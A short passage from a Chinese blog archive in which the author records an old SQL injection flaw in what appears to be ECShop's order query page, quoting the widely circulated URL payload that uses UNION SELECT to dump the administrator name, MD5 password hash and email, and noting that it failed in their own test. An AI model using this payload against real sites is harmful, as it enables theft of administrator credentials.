虽然这个漏洞是很久以前的事了,但我最近工作中曾涉及到。在此做个记录。
网上盛传的注入方法如下,
网址后跟代码
user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
爆出管理员ID、MD5密码散列、E信箱
我测试不能成功[......]
Browsing the archives for the 漏洞 tag